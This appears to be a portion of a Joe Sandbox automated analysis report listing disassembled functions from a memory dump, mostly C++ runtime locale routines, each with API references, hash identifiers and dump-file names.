                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 0f7064173768dda4efbf2fc7d9e3b80d640944a4f505078ca28066fa96a951d9
                                                                      • Instruction ID: 1061e21420ae59e85b9898b0531109049269da4b3b80d5caf0d772971791f101
                                                                      • Opcode Fuzzy Hash: 0f7064173768dda4efbf2fc7d9e3b80d640944a4f505078ca28066fa96a951d9
                                                                      • Instruction Fuzzy Hash: 7941B371901659DFCB11DF58D840BAEBBB4FB08724F14819AE819A7391E730AE05CBF1
                                                                      Function 00D7EC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EC5D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EC80
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7ECA8
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7ED1D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7ED47
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: af0dfc4b6c50ec1f4e6c6aaf5d60c1c8dc6f0e1ca6a256ad1855f240eccb87c0
                                                                      • Instruction ID: 3a7d6d27a73b121d0a30ff711a92a37b24659660c5114b2b02df18800e9391d5
                                                                      • Opcode Fuzzy Hash: af0dfc4b6c50ec1f4e6c6aaf5d60c1c8dc6f0e1ca6a256ad1855f240eccb87c0
                                                                      • Instruction Fuzzy Hash: 2141C475901659DFCB22DF58D840BAEBBB4FB04724F14829AE815A7391E731AE04CBF1
                                                                      Function 00D7ED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7ED9D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EDC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EDE8
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7EE5D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EE87
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: b25f30f6e7c59ba0febc4d472cb51ec1eda38af8e6bdffa36c9c4bceff30f65a
                                                                      • Instruction ID: 3f450c830a96cc0ccca9f705ef7a5c42a8f2e31464d31bfe50cb8f4d5e8e8f8f
                                                                      • Opcode Fuzzy Hash: b25f30f6e7c59ba0febc4d472cb51ec1eda38af8e6bdffa36c9c4bceff30f65a
                                                                      • Instruction Fuzzy Hash: C241C271800259DFCB11DF58D840BAEBBB4FB08724F15869AE815A7391E730AE44CBF1
                                                                      Function 00D77C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000010,00000010,?,00D77912,?,?), ref: 00D77C37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                      • API String ID: 1452528299-1782174991
                                                                      • Opcode ID: 5579f6dee9281b5eb21f48f1190eac816442149b16ac1474187305551803745b
                                                                      • Instruction ID: 029de78958cd53a88f43173f5479e00840e2924023eaeee11d9d3540bd0d37ff
                                                                      • Opcode Fuzzy Hash: 5579f6dee9281b5eb21f48f1190eac816442149b16ac1474187305551803745b
                                                                      • Instruction Fuzzy Hash: DA215949A2426286CB741F3C8401735A2F0EF58759F69586FE8CCD7394F76A8CC283A0
                                                                      Function 00D86FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$Maklocchr
                                                                      • String ID:
                                                                      • API String ID: 2020259771-0
                                                                      • Opcode ID: 05921f46d05f887239f1966408b30294079acb9a308705fe2fe780e3e69fc2b7
                                                                      • Instruction ID: cb11010cf178e20b5680ddb2cfb8b41524422a591d73f45e2e57e7ab3e403592
                                                                      • Opcode Fuzzy Hash: 05921f46d05f887239f1966408b30294079acb9a308705fe2fe780e3e69fc2b7
                                                                      • Instruction Fuzzy Hash: 8C118FB1504744BBE720EBA5D881F12B7ACFF08714F18051AF1858BA41D265FC5087B8
                                                                      Function 00D82823 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8282A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D82834
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • numpunct.LIBCPMT ref: 00D8286E
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D82885
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D828A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID:
                                                                      • API String ID: 743221004-0
                                                                      • Opcode ID: 41b74cc194ee93e07db8f6041fa1c4d73f43e69cbaec22d870b8c1a6527fd82a
                                                                      • Instruction ID: 00eeb050ab5094688be550994dcfb08e4b8f8ce2fa0accc576fbd7e5e26566ed
                                                                      • Opcode Fuzzy Hash: 41b74cc194ee93e07db8f6041fa1c4d73f43e69cbaec22d870b8c1a6527fd82a
                                                                      • Instruction Fuzzy Hash: 1011CB359002199BCF05FB64D856ABE77B2EF84B20F28410AE411AB391EF709E019BB1
                                                                      Function 00D88030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D88037
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D88041
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • numpunct.LIBCPMT ref: 00D8807B
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D88092
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D880B2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID:
                                                                      • API String ID: 743221004-0
                                                                      • Opcode ID: 34d19d15e3bada96494a3aa078dc3e2891087d89e0e2233b80e8a9e01728d47a
                                                                      • Instruction ID: 619945463d2c09ed7e82d48ed1d61b17976babcb635d480bcc3de09aa8e5dc5f
                                                                      • Opcode Fuzzy Hash: 34d19d15e3bada96494a3aa078dc3e2891087d89e0e2233b80e8a9e01728d47a
                                                                      • Instruction Fuzzy Hash: 1A01D236900219CBCF01FBA4D8566AEB761EF80720F29400AF414AB392EF709E059FB0
                                                                      Function 00D875B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D875BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D875C7
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • codecvt.LIBCPMT ref: 00D87601
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87618
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87638
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: 8ffea4aa8775b16e60b4e4a3ef8569639c98db36b98abce80917d15c1425acbb
                                                                      • Instruction ID: 94e3a901ba63feb2cc1ecc39f9ab308a5e15d50bc8acce926c757f9ccab7e5d3
                                                                      • Opcode Fuzzy Hash: 8ffea4aa8775b16e60b4e4a3ef8569639c98db36b98abce80917d15c1425acbb
                                                                      • Instruction Fuzzy Hash: 1D01C0359046199BCF01FB68D8066AE7761EF80720F28400AE411AB392EF70DE01DBB0
                                                                      Function 00D876E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D876E7
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D876F1
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • collate.LIBCPMT ref: 00D8772B
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87742
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87762
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID:
                                                                      • API String ID: 1007100420-0
                                                                      • Opcode ID: c55ef961d9b2de16af54a590d1a1c850e20667221129f9ddf7c4a8d4568bebbb
                                                                      • Instruction ID: 8c468291dd6f5610e675855e8f717ab314b4238bc0a7936d708d4114f07a5e5d
                                                                      • Opcode Fuzzy Hash: c55ef961d9b2de16af54a590d1a1c850e20667221129f9ddf7c4a8d4568bebbb
                                                                      • Instruction Fuzzy Hash: DE01D235904219DBCF01FB64D8066AE7766EF84720F28410AF415AB392EF70DE01DBB0
                                                                      Function 00D8764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87652
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8765C
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • codecvt.LIBCPMT ref: 00D87696
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D876AD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D876CD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: eba3e8cac69ef67dfdee8f93c7cf4b25866194bdba7b7a4c12409c05c48abc44
                                                                      • Instruction ID: 9d53e1f92a0d581564504cf2f4ef32fbfd1c1ab024f4426d8b91fd16df237464
                                                                      • Opcode Fuzzy Hash: eba3e8cac69ef67dfdee8f93c7cf4b25866194bdba7b7a4c12409c05c48abc44
                                                                      • Instruction Fuzzy Hash: 4101C035900A199BCF01FB68D846AAD7B61EF84721F29400AE411AB391EF70DE019FB0
                                                                      Function 00D82664 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8266B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D82675
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • codecvt.LIBCPMT ref: 00D826AF
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D826C6
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D826E6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: a779d24019a53494f8c3ca37a0af75518598dd8b54d18975d19eedc1366ab46b
                                                                      • Instruction ID: 6d614f0b843994758d9408002c4c93b81f9400ce31bad94149ca2bb7002a3f3f
                                                                      • Opcode Fuzzy Hash: a779d24019a53494f8c3ca37a0af75518598dd8b54d18975d19eedc1366ab46b
                                                                      • Instruction Fuzzy Hash: 3701DE35900219DBCF05FB64E8466BE7BA1EF80720F28400AF411AB391EF709E019BB0
                                                                      Function 00D87775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8777C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87786
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • collate.LIBCPMT ref: 00D877C0
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D877D7
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D877F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID:
                                                                      • API String ID: 1007100420-0
                                                                      • Opcode ID: 3803d7bf6741b32789ec8daf65d0a052ba9262cb6e18230a7bbe19181b01a2c7
                                                                      • Instruction ID: 372e8923aacdb279848c140ffbb0fcdb42e25c269df8a6c76a983ddcf32e3c82
                                                                      • Opcode Fuzzy Hash: 3803d7bf6741b32789ec8daf65d0a052ba9262cb6e18230a7bbe19181b01a2c7
                                                                      • Instruction Fuzzy Hash: 95018075904219DBCF05FB64D8466AE7771EF84720F28454AE415AB392EF74DE01CBB0
                                                                      Function 00D938C1 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D938C8
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D938D2
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • collate.LIBCPMT ref: 00D9390C
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93923
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93943
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID:
                                                                      • API String ID: 1007100420-0
                                                                      • Opcode ID: 51be6e1463aef441c46bcf2b4911d20b5f8fff21b36a60614895e298d3e040cc
                                                                      • Instruction ID: 5227f24a12fd033fb2b4ba095caafaf193406b49d9ab866c6c51f29a3084c7a9
                                                                      • Opcode Fuzzy Hash: 51be6e1463aef441c46bcf2b4911d20b5f8fff21b36a60614895e298d3e040cc
                                                                      • Instruction Fuzzy Hash: 9C019235900619DBCF05EB64D8067BEBB65EF84720F28450AF415AB391EF749F018BB4
                                                                      Function 00D8789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D878A6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D878B0
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • messages.LIBCPMT ref: 00D878EA
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87901
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87921
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: a5d3ff9407f1304051806fa1639f27491844ed746fdb0b1123774c6eaff22f33
                                                                      • Instruction ID: ab774d2dad9cdbaac5e08881906d7478b5a4ec608661e44cf058935ed0fa8883
                                                                      • Opcode Fuzzy Hash: a5d3ff9407f1304051806fa1639f27491844ed746fdb0b1123774c6eaff22f33
                                                                      • Instruction Fuzzy Hash: 3A01C035900219CBCF05FB64D8466AE7766EF84720F28440AF418AB3A2EF74DE01CBB0
                                                                      Function 00D8780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87811
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • ctype.LIBCPMT ref: 00D87855
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D8786C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                      • String ID:
                                                                      • API String ID: 83828444-0
                                                                      • Opcode ID: e0b57ff005c08687136d7ec6733affd15d8ec3480d27fb21ba17f75d37fa90b4
                                                                      • Instruction ID: eb74cbe92387904c9a6b3529dbd322015a3a8359ba34e340fb06dc8f6e652ad0
                                                                      • Opcode Fuzzy Hash: e0b57ff005c08687136d7ec6733affd15d8ec3480d27fb21ba17f75d37fa90b4
                                                                      • Instruction Fuzzy Hash: 3C01C075904219DBCB05FBA4D80A6AD7B71EF80720F28450AE411AB391EF70DE01CBB0
                                                                      Function 00D93956 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D9395D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93967
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
